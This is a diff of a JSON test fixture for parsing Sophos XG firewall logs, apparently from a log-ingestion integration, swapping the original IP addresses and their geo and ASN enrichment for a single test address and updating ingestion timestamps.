"82.211.30.202" + "175.16.199.1" ] }, "sophos": { @@ -2409,8 +2473,8 @@ }, "event": { "severity": 5, - "ingested": "2021-06-30T11:19:55.566193700Z", - "original": "device=\"SFW\" date=2018-06-05 time=08:49:00 timezone=\"BST\" device_name=\"XG310\" device_id=C30006T22TGR89B log_id=086320518009 log_type=\"ATP\" log_component=\"Firewall\" log_subtype=\"Alert\" priority=Notice user_name=\"\" protocol=\"ICMP\" src_port=0 dst_port=0 sourceip=10.198.32.89 destinationip=82.211.30.202 url=82.211.30.202 threatname=C2/Generic-A eventid=C7E26E6F-0097-4EA2-89DE-C31C40636CB2 eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid= execution_path=\"\"", + "ingested": "2021-12-09T13:44:55.715058500Z", + "original": "device=\"SFW\" date=2018-06-05 time=08:49:00 timezone=\"BST\" device_name=\"XG310\" device_id=C30006T22TGR89B log_id=086320518009 log_type=\"ATP\" log_component=\"Firewall\" log_subtype=\"Alert\" priority=Notice user_name=\"\" protocol=\"ICMP\" src_port=0 dst_port=0 sourceip=10.198.32.89 destinationip=175.16.199.1 url=175.16.199.1 threatname=C2/Generic-A eventid=C7E26E6F-0097-4EA2-89DE-C31C40636CB2 eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid= execution_path=\"\"", "code": "086320518009", "kind": "alert", "action": "alert", @@ -2429,7 +2493,7 @@ { "server": { "port": 443, - "ip": "182.79.221.19" + "ip": "175.16.199.1" }, "log": { "level": "informational" @@ -2437,21 +2501,23 @@ "destination": { "geo": { "continent_name": "Asia", - "country_name": "India", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 77.0, - "lat": 20.0 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "IN" + "country_iso_code": "CN" }, "as": { - "number": 9498, + "number": 4837, "organization": { - "name": "BHARTI Airtel Ltd." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "182.79.221.19" + "ip": "175.16.199.1" }, "source": { "port": 9444, @@ -2492,7 +2558,7 @@ ], "ip": [ "10.198.47.71", - "182.79.221.19" + "175.16.199.1" ] }, "sophos": { @@ -2519,8 +2585,8 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566201600Z", - "original": "device=\"SFW\" date=2017-01-31 time=14:03:33 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=050901616001 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"jsmith\" user_gp=\"Open Group\" iap=1 category=\"Entertainment\" category_type=\"Unproductive\" url=\"https://r8---sn-ci5gup-qxas.googlevideo.com/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=10.198.47.71 dst_ip=182.79.221.19 protocol=\"TCP\" src_port=9444 dst_port=443 sent_bytes=0 recv_bytes=319007 domain=r8---sn-ci5gup-qxas.googlevideo.com exceptions= activityname=\"\" reason=\"\"", + "ingested": "2021-12-09T13:44:55.715064900Z", + "original": "device=\"SFW\" date=2017-01-31 time=14:03:33 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=050901616001 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"jsmith\" user_gp=\"Open Group\" iap=1 category=\"Entertainment\" category_type=\"Unproductive\" url=\"https://r8---sn-ci5gup-qxas.googlevideo.com/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=10.198.47.71 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=9444 dst_port=443 sent_bytes=0 recv_bytes=319007 domain=r8---sn-ci5gup-qxas.googlevideo.com exceptions= activityname=\"\" reason=\"\"", "code": "050901616001", "kind": "event", "action": "allowed", @@ -2537,51 +2603,52 @@ { "server": { "port": 80, - "ip": "216.58.197.44" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Mountain View", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -122.0748, - "lat": 37.4043 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "216.58.197.44" + "ip": "175.16.199.1" }, "source": { "geo": { - "continent_name": "Europe", - "country_name": "Germany", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 9.491, - "lat": 51.2993 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "DE" + "country_iso_code": "CN" }, "as": { - "number": 6805, + "number": 4837, "organization": { - "name": "Telefonica Germany" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 46719, - "ip": "5.5.5.15" + "ip": "175.16.199.1" }, "url": { "domain": "hanuman.com", @@ -2608,8 +2675,7 @@ "defaulttest.local" ], "ip": [ - "5.5.5.15", - "216.58.197.44" + "175.16.199.1" ] }, "sophos": { @@ -2632,12 +2698,12 @@ }, "client": { "port": 46719, - "ip": "5.5.5.15" + "ip": "175.16.199.1" }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566225600Z", - "original": "device=\"SFW\" date=2017-02-01 time=18:20:21 timezone=\"IST\" device_name=\"SG115\" device_id=S110000E28BA631 log_id=050902616002 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Denied\" status=\"\" priority=Information fw_rule_id=1 user_name=\"\" user_gp=\"\" iap=13 category=\"Religion \u0026 Spirituality\" category_type=\"Unproductive\" url=\"http://hanuman.com/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=5.5.5.15 dst_ip=216.58.197.44 protocol=\"TCP\" src_port=46719 dst_port=80 sent_bytes=0 recv_bytes=0 domain=hanuman.com exceptions= activityname=\"\"", + "ingested": "2021-12-09T13:44:55.715073600Z", + "original": "device=\"SFW\" date=2017-02-01 time=18:20:21 timezone=\"IST\" device_name=\"SG115\" device_id=S110000E28BA631 log_id=050902616002 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Denied\" status=\"\" priority=Information fw_rule_id=1 user_name=\"\" user_gp=\"\" iap=13 category=\"Religion \u0026 Spirituality\" category_type=\"Unproductive\" url=\"http://hanuman.com/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=46719 dst_port=80 sent_bytes=0 recv_bytes=0 domain=hanuman.com exceptions= activityname=\"\"", "code": "050902616002", "kind": "alert", "action": "denied", @@ -2656,48 +2722,52 @@ { "server": { "port": 5228, - "ip": "74.125.130.188" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 5228, - "ip": "74.125.130.188" + "ip": "175.16.199.1" }, "source": { "geo": { - "continent_name": "Europe", - "country_name": "Germany", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 9.491, - "lat": 51.2993 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "DE" + "country_iso_code": "CN" }, "as": { - "number": 6805, + "number": 4837, "organization": { - "name": "Telefonica Germany" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 49128, - "ip": "5.5.5.15" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" @@ -2720,8 +2790,7 @@ "defaulttest.local" ], "ip": [ - "5.5.5.15", - "74.125.130.188" + "175.16.199.1" ] }, "sophos": { @@ -2750,12 +2819,12 @@ }, "client": { "port": 49128, - "ip": "5.5.5.15" + "ip": "175.16.199.1" }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566249600Z", - "original": "device=\"SFW\" date=2017-02-01 time=18:13:29 timezone=\"IST\" device_name=\"SG115\" device_id=S110016E28BA631 log_id=054402617051 log_type=\"Content Filtering\" log_component=\"Application\" log_subtype=\"Denied\" priority=Information fw_rule_id=1 user_name=\"\" user_gp=\"\" application_filter_policy=8 category=\"Mobile Applications\" application_name=\"Gtalk Android\" application_risk=4 application_technology=\"Client Server\" application_category=\"Mobile Applications\" src_ip=5.5.5.15 src_country_code=DEU dst_ip=74.125.130.188 dst_country_code=USA protocol=\"TCP\" src_port=49128 dst_port=5228 sent_bytes=0 recv_bytes=0 status=\"Deny\" message=\"\"", + "ingested": "2021-12-09T13:44:55.715134Z", + "original": "device=\"SFW\" date=2017-02-01 time=18:13:29 timezone=\"IST\" device_name=\"SG115\" device_id=S110016E28BA631 log_id=054402617051 log_type=\"Content Filtering\" log_component=\"Application\" log_subtype=\"Denied\" priority=Information fw_rule_id=1 user_name=\"\" user_gp=\"\" application_filter_policy=8 category=\"Mobile Applications\" application_name=\"Gtalk Android\" application_risk=4 application_technology=\"Client Server\" application_category=\"Mobile Applications\" src_ip=175.16.199.1 src_country_code=DEU dst_ip=175.16.199.1 dst_country_code=USA protocol=\"TCP\" src_port=49128 dst_port=5228 sent_bytes=0 recv_bytes=0 status=\"Deny\" message=\"\"", "code": "054402617051", "kind": "alert", "action": "denied", @@ -2774,36 +2843,52 @@ { "server": { "port": 443, - "ip": "13.79.168.201" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "IE-L", - "city_name": "Dublin", - "country_iso_code": "IE", - "country_name": "Ireland", - "region_name": "Leinster", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -6.2488, - "lat": 53.3338 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 8075, + "number": 4837, "organization": { - "name": "Microsoft Corporation" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "13.79.168.201" + "ip": "175.16.199.1" }, "source": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 62851, - "ip": "172.17.34.10" + "ip": "175.16.199.1" }, "url": { "domain": "his-eur1-neur1.servicebus.windows.net", @@ -2830,8 +2915,7 @@ "testhost.local" ], "ip": [ - "172.17.34.10", - "13.79.168.201" + "175.16.199.1" ] }, "sophos": { @@ -2857,7 +2941,7 @@ }, "client": { "port": 62851, - "ip": "172.17.34.10" + "ip": "175.16.199.1" }, "http": { "response": { @@ -2866,8 +2950,8 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566253Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:51 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=050901616001 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"\" user_gp=\"\" iap=13 category=\"Information Technology\" category_type=\"Acceptable\" url=\"https://his-eur1-neur1.servicebus.windows.net/$servicebus/websocket\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=172.17.34.10 dst_ip=13.79.168.201 protocol=\"TCP\" src_port=62851 dst_port=443 sent_bytes=259 recv_bytes=168 domain=his-eur1-neur1.servicebus.windows.net exceptions=\"\" activityname=\"\" reason=\"\" user_agent=\"\" status_code=\"400\" transactionid=\"\" referer=\"\" download_file_name=\"\" download_file_type=\"\" upload_file_name=\"\" upload_file_type=\"\" con_id=80042000 application=\"\" app_is_cloud=0 override_name=\"\" override_authorizer=\"\"", + "ingested": "2021-12-09T13:44:55.715140500Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:51 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=050901616001 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"\" user_gp=\"\" iap=13 category=\"Information Technology\" category_type=\"Acceptable\" url=\"https://his-eur1-neur1.servicebus.windows.net/$servicebus/websocket\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=62851 dst_port=443 sent_bytes=259 recv_bytes=168 domain=his-eur1-neur1.servicebus.windows.net exceptions=\"\" activityname=\"\" reason=\"\" user_agent=\"\" status_code=\"400\" transactionid=\"\" referer=\"\" download_file_name=\"\" download_file_type=\"\" upload_file_name=\"\" upload_file_type=\"\" con_id=80042000 application=\"\" app_is_cloud=0 override_name=\"\" override_authorizer=\"\"", "code": "050901616001", "kind": "event", "action": "allowed", @@ -2884,40 +2968,56 @@ { "server": { "port": 443, - "ip": "40.90.137.127" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Washington", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -78.1539, - "lat": 38.7095 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 8075, + "number": 4837, "organization": { - "name": "Microsoft Corporation" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "40.90.137.127" + "ip": "175.16.199.1" }, "source": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 60471, - "ip": "172.16.34.15" + "ip": "175.16.199.1" }, "url": { - "domain": "40.90.137.127", - "full": "https://40.90.137.127/" + "domain": "175.16.199.1", + "full": "https://175.16.199.1/" }, "tags": [ "preserve_original_event" @@ -2940,8 +3040,7 @@ "defaulttest.local" ], "ip": [ - "172.16.34.15", - "40.90.137.127" + "175.16.199.1" ] }, "sophos": { @@ -2967,7 +3066,7 @@ }, "client": { "port": 60471, - "ip": "172.16.34.15" + "ip": "175.16.199.1" }, "http": { "response": { @@ -2976,8 +3075,8 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566258100Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:52 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=050902616002 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Denied\" status=\"\" priority=Information fw_rule_id=51 user_name=\"\" user_gp=\"\" iap=2 category=\"IPAddress\" category_type=\"Acceptable\" url=\"https://40.90.137.127/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=172.16.34.15 dst_ip=40.90.137.127 protocol=\"TCP\" src_port=60471 dst_port=443 sent_bytes=0 recv_bytes=0 domain=40.90.137.127 exceptions=\"\" activityname=\"\" reason=\"\" user_agent=\"\" status_code=\"200\" transactionid=\"\" referer=\"\" download_file_name=\"\" download_file_type=\"\" upload_file_name=\"\" upload_file_type=\"\" con_id=642960832 application=\"\" app_is_cloud=0 override_name=\"\" override_authorizer=\"\"", + "ingested": "2021-12-09T13:44:55.715146600Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:52 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=050902616002 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Denied\" status=\"\" priority=Information fw_rule_id=51 user_name=\"\" user_gp=\"\" iap=2 category=\"IPAddress\" category_type=\"Acceptable\" url=\"https://175.16.199.1/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=60471 dst_port=443 sent_bytes=0 recv_bytes=0 domain=175.16.199.1 exceptions=\"\" activityname=\"\" reason=\"\" user_agent=\"\" status_code=\"200\" transactionid=\"\" referer=\"\" download_file_name=\"\" download_file_type=\"\" upload_file_name=\"\" upload_file_type=\"\" con_id=642960832 application=\"\" app_is_cloud=0 override_name=\"\" override_authorizer=\"\"", "code": "050902616002", "kind": "alert", "action": "denied", @@ -2996,36 +3095,52 @@ { "server": { "port": 80, - "ip": "91.228.167.133" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "SK-BL", - "city_name": "Bratislava", - "country_iso_code": "SK", - "country_name": "Slovakia", - "region_name": "Bratislava", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 17.1078, - "lat": 48.15 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 50881, + "number": 4837, "organization": { - "name": "ESET, spol. s r.o." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "91.228.167.133" + "ip": "175.16.199.1" }, "source": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 65391, - "ip": "172.17.34.15" + "ip": "175.16.199.1" }, "url": { "domain": "update.eset.com", @@ -3052,8 +3167,7 @@ "testhost.local" ], "ip": [ - "172.17.34.15", - "91.228.167.133" + "175.16.199.1" ] }, "sophos": { @@ -3080,7 +3194,7 @@ }, "client": { "port": 65391, - "ip": "172.17.34.15" + "ip": "175.16.199.1" }, "http": { "response": { @@ -3089,8 +3203,8 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566263300Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:53 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=050901616001 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"\" user_gp=\"\" iap=13 category=\"Information Technology\" category_type=\"Acceptable\" url=\"http://update.eset.com/eset_upd/ep7/dll/update.ver.signed\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=172.17.34.15 dst_ip=91.228.167.133 protocol=\"TCP\" src_port=65391 dst_port=80 sent_bytes=980 recv_bytes=295 domain=update.eset.com exceptions=av,https,sandstorm activityname=\"\" reason=\"\" user_agent=\"EFSW Update (Windows; U; 64bit; BPC 7.1.12010.0; OS: 10.0.17763 SP 0.0 NT; TDB 45511; CL 1.1.1; x64s; APP efsw; PX 1; PUA 1; CD 1; RA 1; PEV 0; UNS 1; UBR 1158; HVCI 0; SHA256 1; WU 3; HWF: 01009DAA-757A-D666-EFD2-92DD0D501284; PLOC de_de; PCODE 211.0.0; \" status_code=\"304\" transactionid=\"\" referer=\"\" download_file_name=\"\" download_file_type=\"\" upload_file_name=\"\" upload_file_type=\"\" con_id=248426360 application=\"\" app_is_cloud=0 override_name=\"\" override_authorizer=\"\"", + "ingested": "2021-12-09T13:44:55.715152500Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:53 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=050901616001 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"\" user_gp=\"\" iap=13 category=\"Information Technology\" category_type=\"Acceptable\" url=\"http://update.eset.com/eset_upd/ep7/dll/update.ver.signed\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=65391 dst_port=80 sent_bytes=980 recv_bytes=295 domain=update.eset.com exceptions=av,https,sandstorm activityname=\"\" reason=\"\" user_agent=\"EFSW Update (Windows; U; 64bit; BPC 7.1.12010.0; OS: 10.0.17763 SP 0.0 NT; TDB 45511; CL 1.1.1; x64s; APP efsw; PX 1; PUA 1; CD 1; RA 1; PEV 0; UNS 1; UBR 1158; HVCI 0; SHA256 1; WU 3; HWF: 01009DAA-757A-D666-EFD2-92DD0D501284; PLOC de_de; PCODE 211.0.0; \" status_code=\"304\" transactionid=\"\" referer=\"\" download_file_name=\"\" download_file_type=\"\" upload_file_name=\"\" upload_file_type=\"\" con_id=248426360 application=\"\" app_is_cloud=0 override_name=\"\" override_authorizer=\"\"", "code": "050901616001", "kind": "event", "action": "allowed", @@ -3164,7 +3278,7 @@ }, "event": { "severity": 1, - "ingested": "2021-06-30T11:19:55.566269500Z", + "ingested": "2021-12-09T13:44:55.715158400Z", "original": "device=\"SFW\" date=2016-12-02 time=18:50:20 timezone=\"GMT\" device_name=\"SF01V\" device_id=1234567890123456 log_id=058420116010 log_type=\"Content Filtering\" log_component=\"Web Content Policy\" log_subtype=\"Alert\" user=\"gi123456\" src_ip=10.108.108.49 transaction_id=\"e4a127f7-a850-477c-920e-a471b38727c1\" dictionary_name=\"complicated_Custom\" site_category=Information Technology website=\"ta-web-static-testing.qa. astaro.de\" direction=\"in\" action=\"Deny\" file_name=\"cgi_echo.pl\" context_match=\"Not\" context_prefix=\"blah blah hello \" context_suffix=\" hello blah \"", "code": "058420116010", "kind": "event", @@ -3178,29 +3292,31 @@ { "server": { "port": 80, - "ip": "64.233.189.147" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "64.233.189.147" + "ip": "175.16.199.1" }, "source": { "port": 37832, @@ -3241,7 +3357,7 @@ ], "ip": [ "192.168.73.220", - "64.233.189.147" + "175.16.199.1" ] }, "sophos": { @@ -3269,8 +3385,8 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566273300Z", - "original": "device=\"SFW\" date=2016-12-02 time=18:50:20 timezone=\"GMT\" device_name=\"SFVUNL\" device_id=C01001K234RXPA1 log_id=050927616005 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Warned\" status=\"\" priority=Information fw_rule_id=2 user_name=\"rich\" user_gp=\"Clientless Open Group\" iap=13 category=\"Search Engines\" category_type=\"Acceptable\" url=\"http://www.google.com/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=192.168.73.220 dst_ip=64.233.189.147 protocol=\"TCP\" src_port=37832 dst_port=80 sent_bytes=0 recv_bytes=0 domain=www.google.com exceptions= activityname=\" Search\" reason=\"\"", + "ingested": "2021-12-09T13:44:55.715164400Z", + "original": "device=\"SFW\" date=2016-12-02 time=18:50:20 timezone=\"GMT\" device_name=\"SFVUNL\" device_id=C01001K234RXPA1 log_id=050927616005 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Warned\" status=\"\" priority=Information fw_rule_id=2 user_name=\"rich\" user_gp=\"Clientless Open Group\" iap=13 category=\"Search Engines\" category_type=\"Acceptable\" url=\"http://www.google.com/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=192.168.73.220 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=37832 dst_port=80 sent_bytes=0 recv_bytes=0 domain=www.google.com exceptions= activityname=\" Search\" reason=\"\"", "code": "050927616005", "kind": "event", "action": "warned", @@ -3287,29 +3403,31 @@ { "server": { "port": 80, - "ip": "64.233.188.94" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "64.233.188.94" + "ip": "175.16.199.1" }, "source": { "port": 46322, @@ -3350,7 +3468,7 @@ ], "ip": [ "192.168.73.220", - "64.233.188.94" + "175.16.199.1" ] }, "sophos": { @@ -3380,8 +3498,8 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566278600Z", - "original": "device=\"SFW\" date=2016-12-02 time=18:50:22 timezone=\"GMT\" device_name=\"SFVUNL\" device_id=C01001K234RXPA1 log_id=050901616006 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"rich\" user_gp=\"Clientless Open Group\" iap=13 category=\"Search Engines\" category_type=\"Acceptable\" url=\"http://www.google.ca/?gfe_rd=cr\u0026ei=ojxHWP3WC4WN8QeRioDABw\" contenttype=\"text/html\" override_token=\"\" httpresponsecode=\"\" src_ip=192.168.73.220 dst_ip=64.233.188.94 protocol=\"TCP\" src_port=46322 dst_port=80 sent_bytes=0 recv_bytes=619 domain=www.google.ca exceptions= activityname=\"Search\" reason=\"not eligible\"", + "ingested": "2021-12-09T13:44:55.715172700Z", + "original": "device=\"SFW\" date=2016-12-02 time=18:50:22 timezone=\"GMT\" device_name=\"SFVUNL\" device_id=C01001K234RXPA1 log_id=050901616006 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"rich\" user_gp=\"Clientless Open Group\" iap=13 category=\"Search Engines\" category_type=\"Acceptable\" url=\"http://www.google.ca/?gfe_rd=cr\u0026ei=ojxHWP3WC4WN8QeRioDABw\" contenttype=\"text/html\" override_token=\"\" httpresponsecode=\"\" src_ip=192.168.73.220 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=46322 dst_port=80 sent_bytes=0 recv_bytes=619 domain=www.google.ca exceptions= activityname=\"Search\" reason=\"not eligible\"", "code": "050901616006", "kind": "event", "action": "allowed", @@ -3400,15 +3518,32 @@ "level": "informational" }, "source": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "user": { "name": "elastic.user@elastic.test.com", "group": { "name": "Open Group" } }, - "ip": "172.17.35.116" + "ip": "175.16.199.1" }, - "message": "User elastic.user@elastic.test.com of group Open Group logged in successfully to Firewall through AD authentication mechanism from 172.17.35.116", + "message": "User elastic.user@elastic.test.com of group Open Group logged in successfully to Firewall through AD authentication mechanism from 175.16.199.1", "tags": [ "preserve_original_event" ], @@ -3430,7 +3565,7 @@ "testhost.local" ], "ip": [ - "172.17.35.116" + "175.16.199.1" ] }, "sophos": { @@ -3451,12 +3586,12 @@ "name": "testhost.local" }, "client": { - "ip": "172.17.35.116" + "ip": "175.16.199.1" }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566284100Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:57 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062910617701 log_type=\"Event\" log_component=\"Firewall Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"Open Group\" auth_client=\"CTA\" auth_mechanism=\"AD\" reason=\"\" src_ip=172.17.35.116 message=\"User elastic.user@elastic.test.com of group Open Group logged in successfully to Firewall through AD authentication mechanism from 172.17.35.116\" name=\"elastic.user@elastic.test.com\" src_mac=", + "ingested": "2021-12-09T13:44:55.715179Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:57 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062910617701 log_type=\"Event\" log_component=\"Firewall Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"Open Group\" auth_client=\"CTA\" auth_mechanism=\"AD\" reason=\"\" src_ip=175.16.199.1 message=\"User elastic.user@elastic.test.com of group Open Group logged in successfully to Firewall through AD authentication mechanism from 175.16.199.1\" name=\"elastic.user@elastic.test.com\" src_mac=", "code": "062910617701", "kind": "event", "type": [ @@ -3474,54 +3609,55 @@ }, { "server": { - "ip": "214.167.51.66" + "ip": "175.16.199.1" }, "log": { "level": "warning" }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 721, + "number": 4837, "organization": { - "name": "DoD Network Information Center" + "name": "CHINA UNICOM China169 Backbone" } }, - "ip": "214.167.51.66" + "ip": 